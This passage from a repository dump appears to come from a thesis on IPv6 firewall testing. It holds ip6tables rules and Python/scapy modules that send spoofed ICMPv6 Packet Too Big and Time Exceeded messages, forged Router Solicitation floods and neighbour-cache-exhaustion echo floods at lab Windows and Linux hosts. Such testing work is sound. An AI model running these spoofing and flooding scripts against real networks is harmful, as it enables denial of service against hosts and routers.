icmpv6 --icmpv6-type echo-request -j DROP\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type echo-reply -m limit --limit 900/min -j ACCEPT\n#drop explicitly and log ndp messages\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type router-advertisement -j LOG --log-prefix \"Firewall OUT-IN: dropped ra\"\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type router-solicitation -j LOG --log-prefix \"Firewall OUT-IN: dropped rs\"\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type neighbor-advertisement -j LOG --log-prefix \"Firewall 
OUT-IN: dropped na\"\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type neighbor-solicitation -j LOG --log-prefix \"Firewall OUT-IN: dropped ns\"\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type redirect -j LOG --log-prefix \"Firewall OUT-IN: dropped redirect\"\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type router-advertisement -j DROP\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type router-solicitation -j DROP\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type neighbor-advertisement -j DROP\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type neighbor-solicitation -j DROP\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type redirect -j DROP\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 -j DROP\n\n\n" }, { "alpha_fraction": 0.6519148945808411, "alphanum_fraction": 0.7018439769744873, "avg_line_length": 54.79365158081055, "blob_id": "f9ca0fb22fdd2c00280564d44a38a9a932656b33", "content_id": "c7025d1e6d9e0c677626dfcfffe0bbad115fd2cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3525, "license_type": "no_license", "max_line_length": 180, "num_lines": 63, "path": "/python/code/packetTooBig.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\"\"\"\nthe class build Destination Unreachable messages\n\"\"\"\nclass PacketTooBig:\n \n def __init__(self):\n print 'Packet Too Big'\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.attacker = \"2001:abcd:acad:1::2\"\n self.firewall = \"2001:abcd:acad:2::1\"\n\n def execModulePacketTooBigMTUBigWin(self, exitIface):\n for x in range(0, 50):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6PacketTooBig(mtu=2000)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigMTUBigLinux(self, exitIface):\n for x in range(0, 50):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6PacketTooBig(mtu=2000)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigMTUSmallWin(self, exitIface):\n for x in range(0, 50):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6PacketTooBig(mtu=500)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigMTUSmallLinux(self, exitIface):\n for x in range(0, 50):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6PacketTooBig(mtu=500)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigMTUWin(self, exitIface):\n for x in range(0, 50):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6PacketTooBig(mtu=1300)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigMTULinux(self, exitIface):\n for x 
in range(0, 50):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6PacketTooBig(mtu=1300)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigBadCodeWin(self, exitIface):\n for code in range(1, 256):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6PacketTooBig(code=code)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigBadCodeLinux(self, exitIface):\n for code in range(1, 256):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6PacketTooBig(code=code)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n \n" }, { "alpha_fraction": 0.5026572346687317, "alphanum_fraction": 0.581930935382843, "avg_line_length": 37.931034088134766, "blob_id": "f695166d7819f12e6cbeb760a17a92c59d2e1d0b", "content_id": "3fc3a662271ea5253b2668f5ec83fc2950d8dee2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2258, "license_type": "no_license", "max_line_length": 108, "num_lines": 58, "path": "/python/code/RSAttacks.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\n\"\"\"\nThis class test change/addition of prefix and MTU value with Router Advertisement.\n\"\"\" \nclass RS:\n \n def __init__(self):\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.firewall = \"2001:abcd:acad:2::1\"\n self.firewallMac = \"08:00:27:b1:da:41\"\n self.linkFirewall = \"fe80::1\"\n self.prefix = \"2001:abcd:acad:2:\"\n self.allRouter = \"ff02::2\"\n print 'Router Solicitation'\n\n \n def buildPacketInternal(self, mac, src, dst):\n return IPv6(dst=dst,src=src)/ICMPv6ND_RS()/ICMPv6NDOptSrcLLAddr(lladdr=mac)\n\n def buildPacketRemote(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_RS()/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n\n \n def execModuleInternalWin(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex24 = '{:04x}'.format(t)\n mac = \"08:00:27:\" + \"00\" + \":\" + hex24[:2] + \":\" + hex24[2:4]\n globalUni = self.prefix + \":\" + hex24[:2] + \":\" + hex24[2:4]\n packetContainer = self.buildPacketInternal(mac, globalUni, self.win)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleInternalLinux(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex24 = '{:04x}'.format(t)\n mac = \"08:00:27:\" + \"00\" + \":\" + hex24[:2] + \":\" + hex24[2:4]\n globalUni = self.prefix + \":\" + hex24[:2] + \":\" + hex24[2:4]\n packetContainer = self.buildPacketInternal(mac, globalUni, self.linux)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleInternalFirewall(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex24 = '{:04x}'.format(t)\n mac = \"08:00:27:\" + \"00\" + \":\" + hex24[:2] + \":\" + hex24[2:4]\n globalUni = self.prefix + \":\" + hex24[:2] + \":\" + hex24[2:4]\n packetContainer = self.buildPacketInternal(mac, globalUni, self.allRouter)\n send(packetContainer, iface=exitIface, 
verbose=False)\n" }, { "alpha_fraction": 0.6630985736846924, "alphanum_fraction": 0.7121126651763916, "avg_line_length": 55.25396728515625, "blob_id": "d2db5c25f061efa005595ce3fc77ab2a10234dd6", "content_id": "c603c1c4f7881953a8b6874d021806887b9b9296", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3550, "license_type": "no_license", "max_line_length": 186, "num_lines": 63, "path": "/python/code/timeExceeded.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\"\"\"\nthe class build Time Exceeded messages\n\"\"\"\nclass TimeExceeded:\n \n def __init__(self):\n print 'Time Exceeded'\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.attacker = \"2001:abcd:acad:1::2\"\n self.firewall = \"2001:abcd:acad:2::1\"\n\n def execModuleTimeExceededBadCodeWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for code in range(2, 256):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6TimeExceeded(code=code)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededBadCodeLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for code in range(2, 256):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6TimeExceeded(code=code)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededHopLimitWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0, 500):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6TimeExceeded(code=0)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededHopLimitLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0, 500):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6TimeExceeded(code=0)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededFragmentReassemblyWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0, 500):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6TimeExceeded(code=1)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededFragmentReassemblyLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0, 500):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6TimeExceeded(code=1)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededLengthWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0, 256):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6TimeExceeded(code=0,length=x)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleTimeExceededLengthLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in 
range(0, 256):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6TimeExceeded(code=0,length=x)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n \n" }, { "alpha_fraction": 0.5605846047401428, "alphanum_fraction": 0.6256482601165771, "avg_line_length": 35.568965911865234, "blob_id": "98420625e3ef734f98aa54fade77c73c4c9dd529", "content_id": "5381a5addfb44067817c14e662c9db9db0221c4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2121, "license_type": "no_license", "max_line_length": 81, "num_lines": 58, "path": "/python/code/echoRequest.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\n\n\"\"\"\nthe class build Echo Request messages\n\"\"\"\nclass EchoRequest:\n \n def __init__(self):\n print 'Echo Request'\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.attacker = \"2001:abcd:acad:1::2\"\n self.firewall = \"2001:abcd:acad:2::1\"\n\n def buildPacketEchoRequest(self, dst, src):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n return IPv6(dst=dst,src=src)/ICMPv6EchoRequest()/data\n \n\n def execModuleEchoRequestNeighCacheExhaustionDstVictimWin(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex16 = '{:04x}'.format(t)\n src = \"2001:abcd:acad:2::\" + hex16[:4]\n packetContainer = self.buildPacketEchoRequest(self.win, src)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleEchoRequestNeighCacheExhaustionDstVictimLinux(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex16 = '{:04x}'.format(t)\n src = \"2001:abcd:acad:2::\" + hex16[:4]\n packetContainer = self.buildPacketEchoRequest(self.linux, src)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleEchoRequestNeighCacheExhaustionSrcVictimWin(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex16 = '{:04x}'.format(t)\n src = \"2001:abcd:acad:2::\" + hex16[:4]\n packetContainer = self.buildPacketEchoRequest(src, self.win)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleEchoRequestNeighCacheExhaustionSrcVictimLinux(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex16 = '{:04x}'.format(t)\n src = \"2001:abcd:acad:2::\" + hex16[:4]\n packetContainer = self.buildPacketEchoRequest(src, self.linux)\n send(packetContainer, iface=exitIface, verbose=False)\n" } ]
27
cutterbuck/python-dictionaries-lab-data-science-pilot
https://github.com/cutterbuck/python-dictionaries-lab-data-science-pilot
0e3ac8dd966840f44c2dc8e97e772eeab5d5a6ec
bc7d582a5bd71b3aedbe95ea583c3e0b7c646ff6
673c66b6aaddfd131c554c6621fa01714d18e3ce
refs/heads/master
2020-03-10T08:59:51.016093
2018-04-12T19:02:10
2018-04-12T19:02:10
129,299,857
0
0
null
2018-04-12T19:13:00
2018-04-12T19:02:12
2018-04-12T19:02:11
null
[ { "alpha_fraction": 0.6485714316368103, "alphanum_fraction": 0.6785714030265808, "avg_line_length": 39, "blob_id": "5b622660dd63e31a45e77cc6814ded2096ef941b", "content_id": "6f2cad186e4266e4610fd70b4038bee56ad574bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1400, "license_type": "no_license", "max_line_length": 178, "num_lines": 35, "path": "/test_test.py", "repo_name": "cutterbuck/python-dictionaries-lab-data-science-pilot", "src_encoding": "UTF-8", "text": "import unittest2 as unittest\nfrom ipynb.fs.full.index import (greenville, greenville_population, area, city_keys, city_values, cities, salina, los_cabos_pop, city_count, pyeongchang_keys, pyeongchang_values)\n\nclass TestDictionary(unittest.TestCase):\n def test_greenville_population(self):\n self.assertEqual(greenville_population, 84554)\n\n def test_area(self):\n self.assertEqual(area, 68)\n\n def test_city_keys(self):\n self.assertEqual(city_keys, ['Area', 'City', 'Country', 'Population'])\n\n def test_city_values(self):\n self.assertEqual(city_values, [68, 'Greenville', 'USA', 84554])\n\n def test_salina(self):\n self.assertEqual(salina, {'Area': 27, 'City': 'Salina Island', 'Country': 'Italy', 'Population': 4000})\n\n def test_los_cabos_pop(self):\n self.assertEqual(los_cabos_pop, 287651)\n\n def test_city_count(self):\n self.assertEqual(city_count, 12)\n\n def test_change_spelling(self):\n self.assertEqual(cities[11]['City'], 'PyeongChang')\n\n def test_pyeongchang_keys(self):\n self.assertEqual(pyeongchang_keys, ['PyeongChang', 'South Korea', 2581000, 3194])\n self.assertEqual(type(pyeongchang_keys), type(list()))\n\n def test_pyeongchang_values(self):\n self.assertEqual(pyeongchang_values, ['City', 'Country', 'Population', 'Area'])\n self.assertEqual(type(pyeongchang_values), type(list()))\n" } ]
1
kissarat/miracle
https://github.com/kissarat/miracle
05fb4bcde34bdf11e01b60c89819f59aff21506c
d6e6db3307d6d108e33f76fc11966e15f08a8d63
02f2ec2bdcea5bfad584c291c74e417853e4143c
refs/heads/master
2023-05-24T23:25:22.584876
2020-08-01T20:54:30
2020-08-01T20:54:30
282,659,003
0
0
null
2020-07-26T13:47:25
2020-08-01T20:54:44
2023-05-01T21:44:45
Python
[ { "alpha_fraction": 0.5258711576461792, "alphanum_fraction": 0.5311509966850281, "avg_line_length": 27.696969985961914, "blob_id": "5fc010e51617b8561b96d4458748846e2ed43c9e", "content_id": "0a3e2db0165108e6dbbf2ce69080cbdb347d2f7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 947, "license_type": "no_license", "max_line_length": 60, "num_lines": 33, "path": "/nodejs/index.js", "repo_name": "kissarat/miracle", "src_encoding": "UTF-8", "text": "const http = require('http');\nconst { name, version } = require('./package');\n\nlet started;\n\nconst server = http.createServer(function(req, res) {\n let bodySize = 0;\n req.on('data', function(chunk) {\n bodySize += chunk.byteLength;\n });\n req.on('end', function() {\n const time = new Date().toISOString();\n const json = {\n method: req.method,\n url: req.url,\n bodySize,\n time,\n headers: req.headers,\n env: process.env\n };\n res.setHeader('content-type', 'application/json');\n res.setHeader('server', `${name}/${version}`);\n res.setHeader('server-started', started);\n res.write(JSON.stringify(json, null, '\\t'));\n res.end(function() {\n console.log(`${time} ${req.method} ${req.url}`);\n })\n })\n});\n\nserver.listen(process.env.PORT || 8080, () => {\n started = new Date().toISOString();\n});\n" }, { "alpha_fraction": 0.600751519203186, "alphanum_fraction": 0.6176608800888062, "avg_line_length": 28.164382934570312, "blob_id": "c3049fd6edb0e77ee68c7bc764ac0d44ecb97493", "content_id": "00d76c6078b0a63e7861b32201277f600cd5b46b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2129, "license_type": "no_license", "max_line_length": 69, "num_lines": 73, "path": "/python/flask/datastore/main.py", "repo_name": "kissarat/miracle", "src_encoding": "UTF-8", "text": "# [START gae_python37_app]\nimport datetime\nimport logging\nimport socket\nimport time\nimport json\nfrom datetime import datetime\nfrom flask import Flask, request, Response\nfrom os import environ\nfrom google.cloud import datastore\nfrom base64 import b64decode\n\ndb = datastore.Client()\n\napp = Flask(__name__)\n\[email protected]('/<name>')\ndef index(name):\n id = int(round(time.time() * 1000))\n visit = datastore.Entity(db.key('visit-{}'.format(name), id))\n forwarded = request.headers.get('x-forwarded-for')\n if forwarded:\n visit['ip'] = forwarded.split(',')[0].strip()\n else:\n visit['ip'] = request.remote_addr\n location = request.headers.get('x-appengine-citylatlong')\n if location:\n [visit['latitude'], visit['longitude']] = location.split(',')\n city = request.headers.get('x-appengine-city')\n if city:\n visit['city'] = city\n visit['country'] = request.headers.get('x-appengine-country')\n visit['agent'] = request.headers.get('user-agent')\n url = request.args.get('url')\n if url:\n visit['url'] = b64decode(url).decode('utf-8')\n cid = request.args.get('cid')\n if cid:\n visit['cid'] = cid\n db.put(visit)\n result = dict(visit)\n result['id'] = id\n callback = request.args.get('callback')\n if callback:\n return Response(\n '{}({})'.format(callback, json.dumps(result)),\n mimetype='application/javascript',\n headers={\n 'access-control-allow-origin': '*'\n }\n )\n return result\n\[email protected](500)\ndef server_error(e):\n logging.exception('An error occurred during a request.')\n return \"\"\"\n An internal error occurred: <pre>{}</pre>\n See logs for full stacktrace.\n (Miracle server)\n \"\"\".format(e), 500\n\n\nif __name__ == '__main__':\n # 
This is used when running locally. Gunicorn is used to run the\n # application on Google App Engine. See entrypoint in app.yaml.\n port = environ.get('PORT')\n if port:\n port = int(port)\n else:\n port = 8080\n app.run(host='127.0.0.1', port=8080, debug=True)\n# [END gae_python37_app]\n" }, { "alpha_fraction": 0.6019323468208313, "alphanum_fraction": 0.6251207590103149, "avg_line_length": 22.522727966308594, "blob_id": "c40a9372ec562d8ea33899b569615906041d8292", "content_id": "99cf672e464daf66fa23c63329e6ee373dd50e64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1035, "license_type": "no_license", "max_line_length": 68, "num_lines": 44, "path": "/python/flask/reflect-request/main.py", "repo_name": "kissarat/miracle", "src_encoding": "UTF-8", "text": "# [START gae_python37_app]\nimport datetime\nimport logging\nimport socket\nfrom datetime import datetime\nfrom flask import Flask, request\nfrom os import environ\n\nstated = datetime.now().isoformat()\n\n\napp = Flask(__name__)\n\n\[email protected]('/')\ndef index():\n return {\n \"ip\": request.remote_addr,\n \"method\": request.method,\n \"url\": request.url,\n \"headers\": dict(request.headers),\n \"env\": dict(environ)\n }\n\[email protected](500)\ndef server_error(e):\n logging.exception('An error occurred during a request.')\n return \"\"\"\n An internal error occurred: <pre>{}</pre>\n See logs for full stacktrace.\n (Miracle server)\n \"\"\".format(e), 500\n\n\nif __name__ == '__main__':\n # This is used when running locally. Gunicorn is used to run the\n # application on Google App Engine. See entrypoint in app.yaml.\n # port = environ.get('PORT')\n # if port:\n # port = int(port)\n # else:\n # port = 8080\n app.run(host='127.0.0.1', port=8080, debug=True)\n# [END gae_python37_app]\n" }, { "alpha_fraction": 0.7560975551605225, "alphanum_fraction": 0.7560975551605225, "avg_line_length": 12.666666984558105, "blob_id": "85c19438e7fc2d707bf1d7eb166896aacb1f3494", "content_id": "2171c0a06c2977ea8920798e59043454ea7b6699", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 41, "license_type": "no_license", "max_line_length": 27, "num_lines": 3, "path": "/README.md", "repo_name": "kissarat/miracle", "src_encoding": "UTF-8", "text": "Miracle\n====\nGoogle Cloud usage examples\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.7581967115402222, "avg_line_length": 21.18181800842285, "blob_id": "db94f4adcfa68d15155bf7e229b8710452d85956", "content_id": "b84c9b6b8b992e82e01251c5e9c101700ee3e0f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 244, "license_type": "no_license", "max_line_length": 42, "num_lines": 11, "path": "/python/flask/datastore/Dockerfile", "repo_name": "kissarat/miracle", "src_encoding": "UTF-8", "text": "FROM gcr.io/google-appengine/python\nRUN virtualenv /env -p python3.7\nENV VIRTUAL_ENV /env\nENV PATH /env/bin:$PATH\n\nADD requirements.txt /app/requirements.txt\nRUN pip install -r /app/requirements.txt\n\nADD . /app\n\nCMD gunicorn -b :$PORT main:app\n" } ]
5
Mithun-9792/translator
https://github.com/Mithun-9792/translator
e5bb848254e284aa0c86b5e86573be6b41c4106c
15d07c65948e5b67c5e402176cf13c7ace215f4c
b54d708298ffdd556353baf3ef054658a2dfa238
refs/heads/main
2023-08-04T09:04:17.745551
2021-09-17T17:16:17
2021-09-17T17:16:17
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5717234015464783, "alphanum_fraction": 0.5748193860054016, "avg_line_length": 22.274999618530273, "blob_id": "9ea52c45e7ac86d7229df7f67f7098c904a6ff14", "content_id": "49792d6317c201e29bd0c0a8cd9774d737e7149c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 969, "license_type": "no_license", "max_line_length": 63, "num_lines": 40, "path": "/translator.py", "repo_name": "Mithun-9792/translator", "src_encoding": "UTF-8", "text": "import pandas as pd\r\nimport pyttsx3 as pt\r\nimport speech_recognition as sr\r\nfrom googletrans import Translator\r\ntr = Translator()\r\n\r\ndef output(text):\r\n engine = pt.init()\r\n engine.say(text)\r\n engine.runAndWait()\r\n\r\n\r\ndef converter(words):\r\n translated_words = tr.translate(words).text\r\n print(\"In English: \", translated_words)\r\n output(translated_words)\r\n return\r\n\r\n\r\n\r\n\r\ndef takeCommandHindi():\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print('Listening...')\r\n r.pause_threshold = 0.7\r\n audio = r.listen(source)\r\n try:\r\n print('Recognizing...')\r\n query = r.recognize_google(audio, language='hi-In')\r\n print(\"Your request is: '\", query,\"'\")\r\n converter(query)\r\n except Exception as e:\r\n print(e)\r\n print('Say that again sir...')\r\n return \"None\"\r\n return\r\n \r\ndef HindiToEnglish():\r\n takeCommandHindi()" }, { "alpha_fraction": 0.7674418687820435, "alphanum_fraction": 0.7674418687820435, "avg_line_length": 42, "blob_id": "17de34a233a8b26deb5eda721aee55ae4f1d4149", "content_id": "e71f77748bdac2ac6741558f6a2fb050252d7778", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 43, "license_type": "no_license", "max_line_length": 42, "num_lines": 1, "path": "/README.md", "repo_name": "Mithun-9792/translator", "src_encoding": "UTF-8", "text": "## Translator - Hindi to English Converter\n" }, { "alpha_fraction": 0.6232604384422302, "alphanum_fraction": 0.6272366046905518, "avg_line_length": 30.28125, "blob_id": "ee540080de6f4dfe37aa6dc4c1c5873e4e5d1e8a", "content_id": "b36a373a026fb877533ce37eecb80636a43ec18f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1006, "license_type": "no_license", "max_line_length": 83, "num_lines": 32, "path": "/languageconvert.py", "repo_name": "Mithun-9792/translator", "src_encoding": "UTF-8", "text": "from englisttohindi.englisttohindi import EngtoHindi\nimport speech_recognition as sr\nimport pyttsx3\nfrom googletrans import Translator\nr=sr.Recognizer()\ntranslator = Translator()\nwhile True:\n with sr.Microphone() as source:\n x=\"Let's start\"\n res = EngtoHindi(x)\n print(x)\n result = translator.translate(x, dest='hi')\n print(result)\n print(res.convert)\n pyttsx3.speak(res.convert)\n audio=r.listen(source)\n print(\"converting\")\n eng=r.recognize_google(audio)\n if ((\"close\" in eng) or (\"exit\" in eng) or (\"stop\" in eng)) and (\"app\" in eng):\n c=\"closed\"\n re = EngtoHindi(c)\n pyttsx3.speak(re.convert)\n result = translator.translate(c, dest='hi')\n print(result)\n break\n print(\"you spoke\",eng)\n hin=EngtoHindi(eng)\n print(\"this is how it is spoken in HIndi : \")\n result = translator.translate(eng, dest='hi')\n print(result)\n print(hin.convert)\n pyttsx3.speak(hin.convert)\n \n" }, { "alpha_fraction": 0.6020451784133911, "alphanum_fraction": 0.6058798432350159, "avg_line_length": 24.23655891418457, "blob_id": 
"4718c370b34f979f563598df9da0b5b70370b52c", "content_id": "bb4e0f4a7ddeac9eb9c9210b60bc319e4b3f85ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2347, "license_type": "no_license", "max_line_length": 115, "num_lines": 93, "path": "/findSubtitle.py", "repo_name": "Mithun-9792/translator", "src_encoding": "UTF-8", "text": "import time\nimport pandas as pd\nimport pyttsx3 as pt\nimport speech_recognition as sr\nfrom googletrans import Translator\nimport moviepy.editor as mp\ntr = Translator()\n\n\n# this function converts hindi into english\ndef converter(words):\n print('Translating text from hindi to english')\n translated_words = tr.translate(words).text\n print(\"In English: \", translated_words)\n output(translated_words)\n print('Saving the subtitles...')\n file = open('subtitle.txt', 'w')\n file.write(translated_words)\n file.close()\n print('Done')\n return\n\n\n\ndef output(text):\n engine = pt.init()\n \n # to set the rate of speaking\n engine.setProperty('rate',100)\n \n # to get the voices\n voices = engine.getProperty('voices')\n \n #female voice\n engine.setProperty('voice', voices[1].id)\n \n # to speak the text\n engine.say(text)\n \n # save the file in mp3 format\n engine.save_to_file(text, 'test.mp3') \n \n engine.runAndWait()\n\n\n\ndef startConvertion(path = 'my_result.wav',lang = 'hi-IN'):\n with sr.AudioFile(path) as source:\n print('Fetching Audio File...')\n r = sr.Recognizer()\n audio_text = r.listen(source)\n # recoginize_() method will throw a request error if the API is unreachable, hence using exception handling\n try:\n \n # using google speech recognition\n print('Converting audio transcripts into text ...')\n text = r.recognize_google(audio_text)\n print(text)\n\n # to convert the hindi text to english\n converter(text)\n \n except:\n print('Sorry.. run again...')\n query = input(\"Type 'yes' to start again\")\n if query == yes:\n subtitle()\n\n\n\ndef subtitle():\n # to take the file-name of video(only-name)\n video = input()\n\n try:\n # to get that video file from the storage\n print('Searching for the Video...')\n time.sleep(1)\n my_clip = mp.VideoFileClip(fr\"{video}.mp4\")\n\n # to retrieve the audio file from that video\n my_clip.audio.write_audiofile(r\"my_result.wav\")\n startConvertion()\n\n except OSError:\n print(\"Please try again file not found\")\n query = input(\"Type 'yes' to continue\")\n if query == 'yes':\n subtitle()\n\n\n\nsubtitle()\n" } ]
4
